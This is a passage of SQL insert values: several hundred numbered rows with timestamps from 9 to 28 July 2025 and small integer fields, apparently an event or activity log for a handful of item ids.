(18433, '2025-07-09 03:23:23', 1, 2058, 0, 1, 1),
(18434, '2025-07-09 03:24:26', 1, 2053, 0, 1, 1),
(18435, '2025-07-09 03:28:22', 1, 2059, 0, 1, 1),
(18436, '2025-07-09 03:43:24', 1, 2064, 0, 1, 1),
(18437, '2025-07-09 04:41:26', 1, 2059, 0, 1, 1),
(18438, '2025-07-09 04:42:37', 1, 2060, 0, 1, 1),
(18439, '2025-07-09 05:01:23', 1, 2064, 0, 1, 1),
(18440, '2025-07-09 07:20:52', 1, 2060, 0, 1, 1),
(18441, '2025-07-09 07:26:50', 1, 2063, 0, 1, 1),
(18442, '2025-07-09 07:41:27', 1, 2058, 0, 1, 1),
(18443, '2025-07-09 08:09:13', 1, 2055, 0, 1, 1),
(18444, '2025-07-09 08:57:28', 1, 2061, 0, 1, 1),
(18445, '2025-07-09 09:02:23', 1, 2064, 0, 1, 1),
(18446, '2025-07-09 09:03:26', 1, 2054, 0, 1, 1),
(18447, '2025-07-09 09:24:25', 1, 2062, 0, 1, 1),
(18448, '2025-07-09 09:25:44', 1, 2062, 0, 1, 1),
(18449, '2025-07-09 10:19:08', 1, 2060, 0, 1, 1),
(18450, '2025-07-09 10:24:53', 1, 2063, 0, 1, 1),
(18451, '2025-07-09 10:39:00', 1, 2058, 0, 1, 1),
(18452, '2025-07-09 11:06:00', 1, 2055, 0, 1, 1),
(18453, '2025-07-09 11:12:03', 1, 2063, 0, 1, 1),
(18454, '2025-07-09 11:42:18', 1, 2064, 0, 1, 1),
(18455, '2025-07-09 11:55:34', 1, 2061, 0, 1, 1),
(18456, '2025-07-09 12:26:02', 1, 2062, 0, 1, 1),
(18457, '2025-07-09 13:11:07', 1, 2053, 0, 1, 1),
(18458, '2025-07-09 13:36:41', 1, 2054, 0, 1, 1),
(18459, '2025-07-09 13:54:19', 1, 2060, 0, 1, 1),
(18460, '2025-07-09 13:54:31', 1, 2059, 0, 1, 1),
(18461, '2025-07-09 14:04:35', 1, 2062, 0, 1, 1),
(18462, '2025-07-09 14:06:27', 1, 2063, 0, 1, 1),
(18463, '2025-07-09 14:09:20', 1, 2064, 0, 1, 1),
(18464, '2025-07-09 14:54:42', 1, 2062, 0, 1, 1),
(18465, '2025-07-09 19:41:29', 1, 2054, 0, 1, 1),
(18466, '2025-07-09 20:23:36', 1, 2064, 0, 1, 1),
(18467, '2025-07-09 20:37:00', 1, 2059, 0, 1, 1),
(18468, '2025-07-09 20:52:29', 1, 2059, 0, 1, 1),
(18469, '2025-07-09 21:20:11', 1, 2064, 0, 1, 1),
(18470, '2025-07-09 21:34:18', 1, 2060, 0, 1, 1),
(18471, '2025-07-09 21:47:26', 1, 2055, 0, 1, 1),
(18472, '2025-07-09 21:49:12', 1, 2054, 0, 1, 1),
(18473, '2025-07-09 22:16:06', 1, 2054, 0, 1, 1),
(18474, '2025-07-10 01:44:56', 1, 2060, 0, 1, 1),
(18475, '2025-07-10 06:42:13', 1, 2059, 0, 1, 1),
(18476, '2025-07-10 07:15:47', 1, 2053, 0, 1, 1),
(18477, '2025-07-10 08:56:51', 1, 2058, 0, 1, 1),
(18478, '2025-07-10 13:01:57', 1, 2058, 0, 1, 1),
(18479, '2025-07-10 13:39:41', 1, 2061, 0, 1, 1),
(18480, '2025-07-10 14:22:33', 1, 2062, 0, 1, 1),
(18481, '2025-07-10 17:14:41', 1, 2064, 0, 1, 1),
(18482, '2025-07-10 17:58:19', 1, 2061, 0, 1, 1),
(18483, '2025-07-10 18:20:47', 1, 2059, 0, 1, 1),
(18484, '2025-07-10 22:12:57', 1, 2058, 0, 1, 1),
(18485, '2025-07-10 22:24:09', 1, 2054, 0, 1, 1),
(18486, '2025-07-10 23:44:55', 1, 2055, 0, 1, 1),
(18487, '2025-07-11 00:18:24', 1, 2059, 0, 1, 1),
(18488, '2025-07-11 01:33:47', 1, 2064, 0, 1, 1),
(18489, '2025-07-11 01:58:15', 1, 2064, 0, 1, 1),
(18490, '2025-07-11 02:06:47', 1, 2053, 0, 1, 1),
(18491, '2025-07-11 04:08:42', 1, 2064, 0, 1, 1),
(18492, '2025-07-11 05:53:17', 1, 2055, 0, 1, 1),
(18493, '2025-07-11 09:48:06', 1, 2055, 0, 1, 1),
(18494, '2025-07-11 10:57:11', 1, 2055, 0, 1, 1),
(18495, '2025-07-11 12:08:00', 1, 2062, 0, 1, 1),
(18496, '2025-07-11 12:34:12', 1, 2064, 0, 1, 1),
(18497, '2025-07-11 13:20:03', 1, 2060, 0, 1, 1),
(18498, '2025-07-11 14:15:24', 1, 2053, 0, 1, 1),
(18499, '2025-07-11 14:29:35', 1, 2062, 0, 1, 1),
(18500, '2025-07-11 19:57:35', 1, 2064, 0, 1, 1),
(18501, '2025-07-11 22:20:44', 1, 2059, 0, 1, 1),
(18502, '2025-07-11 22:25:05', 1, 2060, 0, 1, 1),
(18503, '2025-07-12 03:48:57', 1, 2060, 0, 1, 1),
(18504, '2025-07-12 10:29:44', 1, 2060, 0, 1, 1),
(18505, '2025-07-12 11:03:45', 1, 2061, 0, 1, 1),
(18506, '2025-07-12 14:38:32', 1, 2062, 0, 1, 1),
(18507, '2025-07-12 16:08:51', 1, 2064, 0, 1, 1),
(18508, '2025-07-12 17:44:34', 1, 2061, 0, 1, 1),
(18509, '2025-07-12 18:05:12', 1, 2060, 0, 1, 1),
(18510, '2025-07-12 18:20:34', 1, 2053, 0, 1, 1),
(18511, '2025-07-12 18:36:17', 1, 2061, 0, 1, 1),
(18512, '2025-07-12 18:44:49', 1, 2058, 0, 1, 1),
(18513, '2025-07-12 19:06:46', 1, 2060, 0, 1, 1),
(18514, '2025-07-12 20:28:52', 1, 2060, 0, 1, 1),
(18515, '2025-07-12 22:56:42', 1, 2061, 0, 1, 1),
(18516, '2025-07-12 23:45:29', 1, 2059, 0, 1, 1),
(18517, '2025-07-13 00:02:24', 1, 2064, 0, 1, 1),
(18518, '2025-07-13 02:25:16', 1, 2062, 0, 1, 1),
(18519, '2025-07-13 02:45:43', 1, 2064, 0, 1, 1),
(18520, '2025-07-13 02:55:23', 1, 2063, 0, 1, 1),
(18521, '2025-07-13 03:24:43', 1, 2053, 0, 1, 1),
(18522, '2025-07-13 04:51:23', 1, 2064, 0, 1, 1),
(18523, '2025-07-13 09:23:17', 1, 2055, 0, 1, 1),
(18524, '2025-07-13 09:33:02', 1, 2054, 0, 1, 1),
(18525, '2025-07-13 09:40:28', 1, 2064, 0, 1, 1),
(18526, '2025-07-13 09:53:49', 1, 2059, 0, 1, 1),
(18527, '2025-07-13 10:11:52', 1, 2055, 0, 1, 1),
(18528, '2025-07-13 10:56:02', 1, 2053, 0, 1, 1),
(18529, '2025-07-13 14:25:57', 1, 2062, 0, 1, 1),
(18530, '2025-07-13 15:47:40', 1, 2059, 0, 1, 1),
(18531, '2025-07-13 16:16:16', 1, 2060, 0, 1, 1),
(18532, '2025-07-13 18:20:06', 1, 2062, 0, 1, 1),
(18533, '2025-07-13 20:56:02', 1, 2055, 0, 1, 1),
(18534, '2025-07-13 21:38:56', 1, 2054, 0, 1, 1),
(18535, '2025-07-13 22:17:07', 1, 2060, 0, 1, 1),
(18536, '2025-07-13 22:29:47', 1, 2061, 0, 1, 1),
(18537, '2025-07-13 22:32:15', 1, 2060, 0, 1, 1),
(18538, '2025-07-13 23:35:25', 1, 2064, 0, 1, 1),
(18539, '2025-07-14 01:00:32', 1, 2062, 0, 1, 1),
(18540, '2025-07-14 01:43:18', 1, 2059, 0, 1, 1),
(18541, '2025-07-14 07:02:35', 1, 2062, 0, 1, 1),
(18542, '2025-07-14 12:02:21', 1, 2055, 0, 1, 1),
(18543, '2025-07-14 12:02:25', 1, 2059, 0, 1, 1),
(18544, '2025-07-14 12:02:26', 1, 2054, 0, 1, 1),
(18545, '2025-07-14 12:02:27', 1, 2060, 0, 1, 1),
(18546, '2025-07-14 12:02:28', 1, 2061, 0, 1, 1),
(18547, '2025-07-14 12:02:30', 1, 2062, 0, 1, 1),
(18548, '2025-07-14 12:02:32', 1, 2064, 0, 1, 1),
(18549, '2025-07-14 12:02:33', 1, 2058, 0, 1, 1),
(18550, '2025-07-14 12:02:34', 1, 2063, 0, 1, 1),
(18551, '2025-07-14 12:58:17', 1, 2053, 0, 1, 1),
(18552, '2025-07-14 13:12:50', 1, 2064, 0, 1, 1),
(18553, '2025-07-14 14:55:50', 1, 2062, 0, 1, 1),
(18554, '2025-07-14 15:37:57', 1, 2064, 0, 1, 1),
(18555, '2025-07-14 16:08:41', 1, 2059, 0, 1, 1),
(18556, '2025-07-14 17:50:39', 1, 2058, 0, 1, 1),
(18557, '2025-07-14 18:09:04', 1, 2053, 0, 1, 1),
(18558, '2025-07-14 18:50:19', 1, 2060, 0, 1, 1),
(18559, '2025-07-14 19:18:03', 1, 2060, 0, 1, 1),
(18560, '2025-07-14 21:23:12', 1, 2063, 0, 1, 1),
(18561, '2025-07-14 22:37:07', 1, 2054, 0, 1, 1),
(18562, '2025-07-14 23:14:55', 1, 2062, 0, 1, 1),
(18563, '2025-07-14 23:14:59', 1, 2061, 0, 1, 1),
(18564, '2025-07-14 23:15:03', 1, 2063, 0, 1, 1),
(18565, '2025-07-15 01:10:51', 1, 2053, 0, 1, 1),
(18566, '2025-07-15 01:24:08', 1, 2063, 0, 1, 1),
(18567, '2025-07-15 01:30:32', 1, 2060, 0, 1, 1),
(18568, '2025-07-15 01:31:58', 1, 2054, 0, 1, 1),
(18569, '2025-07-15 05:12:55', 1, 2064, 0, 1, 1),
(18570, '2025-07-15 05:31:43', 1, 2064, 0, 1, 1),
(18571, '2025-07-15 05:33:35', 1, 2062, 0, 1, 1),
(18572, '2025-07-15 06:08:11', 1, 2054, 0, 1, 1),
(18573, '2025-07-15 06:08:17', 1, 2055, 0, 1, 1),
(18574, '2025-07-15 06:08:22', 1, 2058, 0, 1, 1),
(18575, '2025-07-15 06:08:30', 1, 2059, 0, 1, 1),
(18576, '2025-07-15 06:08:38', 1, 2060, 0, 1, 1),
(18577, '2025-07-15 06:08:43', 1, 2061, 0, 1, 1),
(18578, '2025-07-15 06:08:46', 1, 2062, 0, 1, 1),
(18579, '2025-07-15 06:08:51', 1, 2063, 0, 1, 1),
(18580, '2025-07-15 06:09:06', 1, 2064, 0, 1, 1),
(18581, '2025-07-15 06:09:14', 1, 2064, 0, 1, 1),
(18582, '2025-07-15 06:09:22', 1, 2064, 0, 1, 1),
(18583, '2025-07-15 06:16:03', 1, 2053, 0, 1, 1),
(18584, '2025-07-15 06:53:24', 1, 2060, 0, 1, 1),
(18585, '2025-07-15 07:08:22', 1, 2058, 0, 1, 1),
(18586, '2025-07-15 07:21:42', 1, 2063, 0, 1, 1),
(18587, '2025-07-15 08:39:36', 1, 2058, 0, 1, 1),
(18588, '2025-07-15 08:51:47', 1, 2064, 0, 1, 1),
(18589, '2025-07-15 12:16:05', 1, 2055, 0, 1, 1),
(18590, '2025-07-15 13:51:51', 1, 2059, 0, 1, 1),
(18591, '2025-07-15 14:29:10', 1, 2062, 0, 1, 1),
(18592, '2025-07-15 15:59:28', 1, 2060, 0, 1, 1),
(18593, '2025-07-15 19:15:12', 1, 2053, 0, 1, 1),
(18594, '2025-07-15 20:06:25', 1, 2058, 0, 1, 1),
(18595, '2025-07-15 20:06:27', 1, 2054, 0, 1, 1),
(18596, '2025-07-15 21:02:29', 1, 2060, 0, 1, 1),
(18597, '2025-07-15 21:14:50', 1, 2062, 0, 1, 1),
(18598, '2025-07-15 21:38:43', 1, 2063, 0, 1, 1),
(18599, '2025-07-15 22:41:11', 1, 2059, 0, 1, 1),
(18600, '2025-07-15 23:23:33', 1, 2053, 0, 1, 1),
(18601, '2025-07-16 01:19:36', 1, 2063, 0, 1, 1),
(18602, '2025-07-16 06:15:43', 1, 2053, 0, 1, 1),
(18603, '2025-07-16 07:00:15', 1, 2059, 0, 1, 1),
(18604, '2025-07-16 12:00:01', 1, 2061, 0, 1, 1),
(18605, '2025-07-16 14:12:23', 1, 2060, 0, 1, 1),
(18606, '2025-07-16 14:31:52', 1, 2062, 0, 1, 1),
(18607, '2025-07-16 19:01:34', 1, 2054, 0, 1, 1),
(18608, '2025-07-16 19:07:03', 1, 2058, 0, 1, 1),
(18609, '2025-07-16 19:27:25', 1, 2059, 0, 1, 1),
(18610, '2025-07-16 19:32:39', 1, 2064, 0, 1, 1),
(18611, '2025-07-16 19:55:33', 1, 2054, 0, 1, 1),
(18612, '2025-07-16 20:47:40', 1, 2060, 0, 1, 1),
(18613, '2025-07-16 21:10:22', 1, 2055, 0, 1, 1),
(18614, '2025-07-16 21:17:44', 1, 2059, 0, 1, 1),
(18615, '2025-07-16 23:06:10', 1, 2058, 0, 1, 1),
(18616, '2025-07-17 01:39:42', 1, 2060, 0, 1, 1),
(18617, '2025-07-17 02:08:28', 1, 2064, 0, 1, 1),
(18618, '2025-07-17 03:30:37', 1, 2061, 0, 1, 1),
(18619, '2025-07-17 04:03:11', 1, 2053, 0, 1, 1),
(18620, '2025-07-17 05:11:28', 1, 2064, 0, 1, 1),
(18621, '2025-07-17 05:43:29', 1, 2061, 0, 1, 1),
(18622, '2025-07-17 14:14:40', 1, 2064, 0, 1, 1),
(18623, '2025-07-17 14:43:27', 1, 2062, 0, 1, 1),
(18624, '2025-07-17 15:07:14', 1, 2063, 0, 1, 1),
(18625, '2025-07-17 15:25:42', 1, 2054, 0, 1, 1),
(18626, '2025-07-17 16:26:05', 1, 2060, 0, 1, 1),
(18627, '2025-07-17 16:37:56', 1, 2061, 0, 1, 1),
(18628, '2025-07-17 16:51:33', 1, 2058, 0, 1, 1),
(18629, '2025-07-17 16:57:59', 1, 2055, 0, 1, 1),
(18630, '2025-07-17 17:07:42', 1, 2054, 0, 1, 1),
(18631, '2025-07-17 17:46:17', 1, 2064, 0, 1, 1),
(18632, '2025-07-17 20:07:02', 1, 2053, 0, 1, 1),
(18633, '2025-07-17 20:15:16', 1, 2055, 0, 1, 1),
(18634, '2025-07-17 21:06:03', 1, 2059, 0, 1, 1),
(18635, '2025-07-17 22:09:37', 1, 2064, 0, 1, 1),
(18636, '2025-07-17 23:42:05', 1, 2060, 0, 1, 1),
(18637, '2025-07-17 23:49:40', 1, 2064, 0, 1, 1),
(18638, '2025-07-17 23:59:05', 1, 2063, 0, 1, 1),
(18639, '2025-07-18 00:30:24', 1, 2064, 0, 1, 1),
(18640, '2025-07-18 00:39:43', 1, 2059, 0, 1, 1),
(18641, '2025-07-18 01:27:28', 1, 2062, 0, 1, 1),
(18642, '2025-07-18 04:00:07', 1, 2053, 0, 1, 1),
(18643, '2025-07-18 11:46:38', 1, 2062, 0, 1, 1),
(18644, '2025-07-18 14:37:04', 1, 2062, 0, 1, 1),
(18645, '2025-07-18 15:00:36', 1, 2064, 0, 1, 1),
(18646, '2025-07-18 15:22:06', 1, 2064, 0, 1, 1),
(18647, '2025-07-18 19:30:54', 1, 2053, 0, 1, 1),
(18648, '2025-07-18 19:40:03', 1, 2055, 0, 1, 1),
(18649, '2025-07-18 19:51:01', 1, 2060, 0, 1, 1),
(18650, '2025-07-18 19:51:41', 1, 2058, 0, 1, 1),
(18651, '2025-07-18 19:52:52', 1, 2061, 0, 1, 1),
(18652, '2025-07-18 19:54:07', 1, 2064, 0, 1, 1),
(18653, '2025-07-18 20:12:36', 1, 2062, 0, 1, 1),
(18654, '2025-07-18 20:32:44', 1, 2063, 0, 1, 1),
(18655, '2025-07-18 20:47:38', 1, 2055, 0, 1, 1),
(18656, '2025-07-18 20:49:30', 1, 2059, 0, 1, 1),
(18657, '2025-07-18 21:03:31', 1, 2054, 0, 1, 1),
(18658, '2025-07-18 22:38:47', 1, 2055, 0, 1, 1),
(18659, '2025-07-19 00:16:15', 1, 2064, 0, 1, 1),
(18660, '2025-07-19 01:53:02', 1, 2060, 0, 1, 1),
(18661, '2025-07-19 07:35:47', 1, 2053, 0, 1, 1),
(18662, '2025-07-19 07:57:22', 1, 2054, 0, 1, 1),
(18663, '2025-07-19 08:28:04', 1, 2064, 0, 1, 1),
(18664, '2025-07-19 08:30:03', 1, 2060, 0, 1, 1),
(18665, '2025-07-19 12:48:22', 1, 2053, 0, 1, 1),
(18666, '2025-07-19 14:39:15', 1, 2062, 0, 1, 1),
(18667, '2025-07-19 17:15:46', 1, 2061, 0, 1, 1),
(18668, '2025-07-19 17:52:41', 1, 2064, 0, 1, 1),
(18669, '2025-07-19 18:10:43', 1, 2060, 0, 1, 1),
(18670, '2025-07-19 18:55:25', 1, 2058, 0, 1, 1),
(18671, '2025-07-19 21:54:54', 1, 2060, 0, 1, 1),
(18672, '2025-07-19 22:14:43', 1, 2058, 0, 1, 1),
(18673, '2025-07-19 22:41:36', 1, 2054, 0, 1, 1),
(18674, '2025-07-19 23:07:31', 1, 2063, 0, 1, 1),
(18675, '2025-07-19 23:38:19', 1, 2053, 0, 1, 1),
(18676, '2025-07-19 23:44:43', 1, 2053, 0, 1, 1),
(18677, '2025-07-20 00:17:28', 1, 2062, 0, 1, 1),
(18678, '2025-07-20 00:42:13', 1, 2053, 0, 1, 1),
(18679, '2025-07-20 01:28:56', 1, 2053, 0, 1, 1),
(18680, '2025-07-20 05:03:34', 1, 2064, 0, 1, 1),
(18681, '2025-07-20 07:06:52', 1, 2062, 0, 1, 1),
(18682, '2025-07-20 07:17:33', 1, 2064, 0, 1, 1),
(18683, '2025-07-20 07:18:16', 1, 2064, 0, 1, 1),
(18684, '2025-07-20 07:23:39', 1, 2061, 0, 1, 1),
(18685, '2025-07-20 07:24:01', 1, 2058, 0, 1, 1),
(18686, '2025-07-20 08:35:29', 1, 2061, 0, 1, 1),
(18687, '2025-07-20 12:33:02', 1, 2062, 0, 1, 1),
(18688, '2025-07-20 14:50:40', 1, 2064, 0, 1, 1),
(18689, '2025-07-20 17:24:49', 1, 2054, 0, 1, 1),
(18690, '2025-07-20 18:10:28', 1, 2061, 0, 1, 1),
(18691, '2025-07-20 20:03:34', 1, 2062, 0, 1, 1),
(18692, '2025-07-20 20:10:39', 1, 2058, 0, 1, 1),
(18693, '2025-07-20 20:29:44', 1, 2060, 0, 1, 1),
(18694, '2025-07-20 22:42:22', 1, 2063, 0, 1, 1),
(18695, '2025-07-21 00:20:08', 1, 2063, 0, 1, 1),
(18696, '2025-07-21 00:20:15', 1, 2061, 0, 1, 1),
(18697, '2025-07-21 00:20:18', 1, 2062, 0, 1, 1),
(18698, '2025-07-21 00:46:39', 1, 2059, 0, 1, 1),
(18699, '2025-07-21 02:02:14', 1, 2063, 0, 1, 1),
(18700, '2025-07-21 05:17:27', 1, 2060, 0, 1, 1),
(18701, '2025-07-21 05:32:31', 1, 2061, 0, 1, 1),
(18702, '2025-07-21 05:35:28', 1, 2063, 0, 1, 1),
(18703, '2025-07-21 06:21:14', 1, 2058, 0, 1, 1),
(18704, '2025-07-21 07:46:57', 1, 2055, 0, 1, 1),
(18705, '2025-07-21 09:31:41', 1, 2061, 0, 1, 1),
(18706, '2025-07-21 09:53:25', 1, 2060, 0, 1, 1),
(18707, '2025-07-21 10:02:17', 1, 2061, 0, 1, 1),
(18708, '2025-07-21 10:26:23', 1, 2054, 0, 1, 1),
(18709, '2025-07-21 11:10:40', 1, 2062, 0, 1, 1),
(18710, '2025-07-21 11:58:18', 1, 2059, 0, 1, 1),
(18711, '2025-07-21 13:19:32', 1, 2054, 0, 1, 1),
(18712, '2025-07-21 13:47:45', 1, 2059, 0, 1, 1),
(18713, '2025-07-21 14:10:03', 1, 2055, 0, 1, 1),
(18714, '2025-07-21 14:10:26', 1, 2064, 0, 1, 1),
(18715, '2025-07-21 14:20:02', 1, 2062, 0, 1, 1),
(18716, '2025-07-21 17:16:51', 1, 2055, 0, 1, 1),
(18717, '2025-07-21 19:31:58', 1, 2053, 0, 1, 1),
(18718, '2025-07-21 19:43:16', 1, 2053, 0, 1, 1),
(18719, '2025-07-21 20:55:30', 1, 2054, 0, 1, 1),
(18720, '2025-07-21 21:28:40', 1, 2055, 0, 1, 1),
(18721, '2025-07-21 23:16:23', 1, 2053, 0, 1, 1),
(18722, '2025-07-22 06:37:36', 1, 2053, 0, 1, 1),
(18723, '2025-07-22 07:21:11', 1, 2054, 0, 1, 1),
(18724, '2025-07-22 08:27:48', 1, 2063, 0, 1, 1),
(18725, '2025-07-22 08:29:32', 1, 2060, 0, 1, 1),
(18726, '2025-07-22 12:17:46', 1, 2058, 0, 1, 1),
(18727, '2025-07-22 12:18:30', 1, 2061, 0, 1, 1),
(18728, '2025-07-22 12:18:40', 1, 2059, 0, 1, 1),
(18729, '2025-07-22 12:18:50', 1, 2060, 0, 1, 1),
(18730, '2025-07-22 12:18:59', 1, 2062, 0, 1, 1),
(18731, '2025-07-22 12:19:08', 1, 2063, 0, 1, 1),
(18732, '2025-07-22 12:19:19', 1, 2064, 0, 1, 1),
(18733, '2025-07-22 12:21:10', 1, 2055, 0, 1, 1),
(18734, '2025-07-22 12:21:24', 1, 2054, 0, 1, 1),
(18735, '2025-07-22 12:21:38', 1, 2053, 0, 1, 1),
(18736, '2025-07-22 12:55:39', 1, 2058, 0, 1, 1),
(18737, '2025-07-22 12:55:52', 1, 2061, 0, 1, 1),
(18738, '2025-07-22 12:56:06', 1, 2059, 0, 1, 1),
(18739, '2025-07-22 12:56:18', 1, 2060, 0, 1, 1),
(18740, '2025-07-22 12:56:34', 1, 2062, 0, 1, 1),
(18741, '2025-07-22 12:56:47', 1, 2063, 0, 1, 1),
(18742, '2025-07-22 12:57:00', 1, 2064, 0, 1, 1),
(18743, '2025-07-22 12:59:05', 1, 2055, 0, 1, 1),
(18744, '2025-07-22 12:59:19', 1, 2054, 0, 1, 1),
(18745, '2025-07-22 12:59:34', 1, 2053, 0, 1, 1),
(18746, '2025-07-22 13:09:54', 1, 2058, 0, 1, 1),
(18747, '2025-07-22 14:26:04', 1, 2062, 0, 1, 1),
(18748, '2025-07-22 16:38:03', 1, 2061, 0, 1, 1),
(18749, '2025-07-22 16:50:29', 1, 2058, 0, 1, 1),
(18750, '2025-07-22 17:01:05', 1, 2055, 0, 1, 1),
(18751, '2025-07-22 17:11:28', 1, 2054, 0, 1, 1),
(18752, '2025-07-22 18:12:37', 1, 2054, 0, 1, 1),
(18753, '2025-07-22 19:28:59', 1, 2059, 0, 1, 1),
(18754, '2025-07-22 19:31:47', 1, 2064, 0, 1, 1),
(18755, '2025-07-22 21:43:19', 1, 2060, 0, 1, 1),
(18756, '2025-07-22 21:43:27', 1, 2059, 0, 1, 1),
(18757, '2025-07-22 23:26:20', 1, 2062, 0, 1, 1),
(18758, '2025-07-22 23:45:38', 1, 2060, 0, 1, 1),
(18759, '2025-07-23 00:15:57', 1, 2064, 0, 1, 1),
(18760, '2025-07-23 00:46:41', 1, 2060, 0, 1, 1),
(18761, '2025-07-23 06:30:56', 1, 2064, 0, 1, 1),
(18762, '2025-07-23 06:40:06', 1, 2063, 0, 1, 1),
(18763, '2025-07-23 06:55:52', 1, 2064, 0, 1, 1),
(18764, '2025-07-23 06:58:09', 1, 2061, 0, 1, 1),
(18765, '2025-07-23 07:02:22', 1, 2059, 0, 1, 1),
(18766, '2025-07-23 07:18:59', 1, 2058, 0, 1, 1),
(18767, '2025-07-23 07:31:30', 1, 2063, 0, 1, 1),
(18768, '2025-07-23 08:55:32', 1, 2054, 0, 1, 1),
(18769, '2025-07-23 08:55:34', 1, 2058, 0, 1, 1),
(18770, '2025-07-23 14:44:32', 1, 2062, 0, 1, 1),
(18771, '2025-07-23 15:14:50', 1, 2060, 0, 1, 1),
(18772, '2025-07-23 15:15:27', 1, 2061, 0, 1, 1),
(18773, '2025-07-23 15:15:28', 1, 2053, 0, 1, 1),
(18774, '2025-07-23 18:11:43', 1, 2061, 0, 1, 1),
(18775, '2025-07-23 19:55:43', 1, 2058, 0, 1, 1),
(18776, '2025-07-23 20:23:18', 1, 2053, 0, 1, 1),
(18777, '2025-07-24 01:29:13', 1, 2060, 0, 1, 1),
(18778, '2025-07-24 05:35:41', 1, 2062, 0, 1, 1),
(18779, '2025-07-24 07:58:33', 1, 2060, 0, 1, 1),
(18780, '2025-07-24 09:46:44', 1, 2061, 0, 1, 1),
(18781, '2025-07-24 12:09:38', 1, 2054, 0, 1, 1),
(18782, '2025-07-24 12:49:33', 1, 2061, 0, 1, 1),
(18783, '2025-07-24 13:40:36', 1, 2061, 0, 1, 1),
(18784, '2025-07-24 14:53:09', 1, 2062, 0, 1, 1),
(18785, '2025-07-24 15:12:15', 1, 2060, 0, 1, 1),
(18786, '2025-07-25 00:54:23', 1, 2061, 0, 1, 1),
(18787, '2025-07-25 04:17:57', 1, 2061, 0, 1, 1),
(18788, '2025-07-25 04:28:52', 1, 2060, 0, 1, 1),
(18789, '2025-07-25 05:42:43', 1, 2059, 0, 1, 1),
(18790, '2025-07-25 06:40:56', 1, 2060, 0, 1, 1),
(18791, '2025-07-25 07:15:31', 1, 2061, 0, 1, 1),
(18792, '2025-07-25 07:46:35', 1, 2053, 0, 1, 1),
(18793, '2025-07-25 08:40:27', 1, 2059, 0, 1, 1),
(18794, '2025-07-25 10:25:45', 1, 2053, 0, 1, 1),
(18795, '2025-07-25 10:26:46', 1, 2062, 0, 1, 1),
(18796, '2025-07-25 14:16:11', 1, 2064, 0, 1, 1),
(18797, '2025-07-25 14:54:34', 1, 2062, 0, 1, 1),
(18798, '2025-07-25 15:11:14', 1, 2064, 0, 1, 1),
(18799, '2025-07-25 17:19:38', 1, 2061, 0, 1, 1),
(18800, '2025-07-25 19:07:10', 1, 2064, 0, 1, 1),
(18801, '2025-07-25 21:49:35', 1, 2060, 0, 1, 1),
(18802, '2025-07-25 22:15:26', 1, 2054, 0, 1, 1),
(18803, '2025-07-25 22:19:42', 1, 2060, 0, 1, 1),
(18804, '2025-07-25 23:23:38', 1, 2058, 0, 1, 1),
(18805, '2025-07-26 02:09:52', 1, 2062, 0, 1, 1),
(18806, '2025-07-26 02:11:39', 1, 2062, 0, 1, 1),
(18807, '2025-07-26 02:11:56', 1, 2053, 0, 1, 1),
(18808, '2025-07-26 02:12:47', 1, 2061, 0, 1, 1),
(18809, '2025-07-26 02:13:31', 1, 2063, 0, 1, 1),
(18810, '2025-07-26 02:16:08', 1, 2063, 0, 1, 1),
(18811, '2025-07-26 02:21:03', 1, 2059, 0, 1, 1),
(18812, '2025-07-26 02:21:20', 1, 2058, 0, 1, 1),
(18813, '2025-07-26 02:23:08', 1, 2059, 0, 1, 1),
(18814, '2025-07-26 02:28:05', 1, 2055, 0, 1, 1),
(18815, '2025-07-26 02:32:38', 1, 2055, 0, 1, 1),
(18816, '2025-07-26 02:37:03', 1, 2054, 0, 1, 1),
(18817, '2025-07-26 02:41:24', 1, 2054, 0, 1, 1),
(18818, '2025-07-26 03:40:18', 1, 2060, 0, 1, 1),
(18819, '2025-07-26 03:48:04', 1, 2060, 0, 1, 1),
(18820, '2025-07-26 03:50:42', 1, 2060, 0, 1, 1),
(18821, '2025-07-26 05:22:30', 1, 2061, 0, 1, 1),
(18822, '2025-07-26 08:09:35', 1, 2059, 0, 1, 1),
(18823, '2025-07-26 14:17:31', 1, 2062, 0, 1, 1),
(18824, '2025-07-26 14:38:05', 1, 2062, 0, 1, 1),
(18825, '2025-07-26 14:38:53', 1, 2060, 0, 1, 1),
(18826, '2025-07-26 14:58:58', 1, 2060, 0, 1, 1),
(18827, '2025-07-26 16:30:26', 1, 2059, 0, 1, 1),
(18828, '2025-07-26 19:52:03', 1, 2060, 0, 1, 1),
(18829, '2025-07-26 22:36:12', 1, 2061, 0, 1, 1),
(18830, '2025-07-27 01:16:17', 1, 2063, 0, 1, 1),
(18831, '2025-07-27 01:46:22', 1, 2060, 0, 1, 1),
(18832, '2025-07-27 04:09:43', 1, 2054, 0, 1, 1),
(18833, '2025-07-27 08:53:52', 1, 2064, 0, 1, 1),
(18834, '2025-07-27 11:00:03', 1, 2061, 0, 1, 1),
(18835, '2025-07-27 13:25:06', 1, 2058, 0, 1, 1),
(18836, '2025-07-27 14:11:29', 1, 2061, 0, 1, 1),
(18837, '2025-07-27 14:18:21', 1, 2062, 0, 1, 1),
(18838, '2025-07-27 14:21:50', 1, 2060, 0, 1, 1),
(18839, '2025-07-27 17:38:01', 1, 2054, 0, 1, 1),
(18840, '2025-07-27 22:00:38', 1, 2061, 0, 1, 1),
(18841, '2025-07-27 22:11:20', 1, 2058, 0, 1, 1),
(18842, '2025-07-27 22:20:47', 1, 2055, 0, 1, 1),
(18843, '2025-07-27 22:31:10', 1, 2054, 0, 1, 1),
(18844, '2025-07-27 23:06:09', 1, 2063, 0, 1, 1),
(18845, '2025-07-27 23:06:13', 1, 2062, 0, 1, 1),
(18846, '2025-07-27 23:06:17', 1, 2061, 0, 1, 1),
(18847, '2025-07-27 23:11:01', 1, 2058, 0, 1, 1),
(18848, '2025-07-28 01:36:03', 1, 2061, 0, 1, 1),
(18849, '2025-07-28 03:03:10', 1, 2054, 0, 1, 1),
(18850, '2025-07-28 03:18:19', 1, 2055, 0, 1, 1),
(18851, '2025-07-28 03:39:47', 1, 2059, 0, 1, 1),
(18852, '2025-07-28 05:00:11', 1, 2060, 0, 1, 1),
(18853, '2025-07-28 05:08:40', 1, 2064, 0, 1, 1),
(18854, '2025-07-28 05:18:37', 1, 2059, 0, 1, 1),
(18855, '2025-07-28 05:49:06', 1, 2062, 0, 1, 1),
(18856, '2025-07-28 06:56:49', 1, 2064, 0, 1, 1),
(18857, '2025-07-28 06:58:08', 1, 2060, 0, 1, 1),
(18858, '2025-07-28 08:42:45', 1, 2061, 0, 1, 1),
(18859, '2025-07-28 10:24:10', 1, 2060, 0, 1, 1),
(18860, '2025-07-28 10:59:03', 1, 2064, 0, 1, 1),
